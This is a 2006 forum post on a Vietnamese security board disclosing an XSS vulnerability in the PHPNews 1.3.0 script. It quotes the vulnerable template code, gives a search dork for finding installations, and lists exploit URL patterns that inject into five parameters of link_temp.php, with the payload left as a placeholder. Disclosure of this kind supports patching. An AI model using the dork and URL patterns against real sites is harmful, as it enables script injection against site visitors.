banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits PHP News 1.3.0  XML
  [Announcement]   PHP News 1.3.0 14/12/2006 15:50:09 (+0700) | #1 | 30448
[Avatar]
havythoai
HVA Friend

Joined: 05/04/2004 22:59:39
Messages: 562
Offline
[Profile] [PM] [WWW]
PHP Script: PHPNews 1.3.0
Class: XSS
Website: http://newsphp.sourceforge.net
Found by: Detefix
dork: inurl:phpnews

-----

- Vulnerable Code:

<?php
print<<<EOT
<a href="$url?action=fullnews&showcomments=1&id=$id">$subject</a> by $username on $time<br />

-----

- Exploits:

http://[target]/[path-to-PHPNews]/templates/link_temp.php?url=">[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?id=">[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?subject=[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?username=[XSS]

http://[target]/[path-to-PHPNews]/templates/link_temp.php?time=[XSS]
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|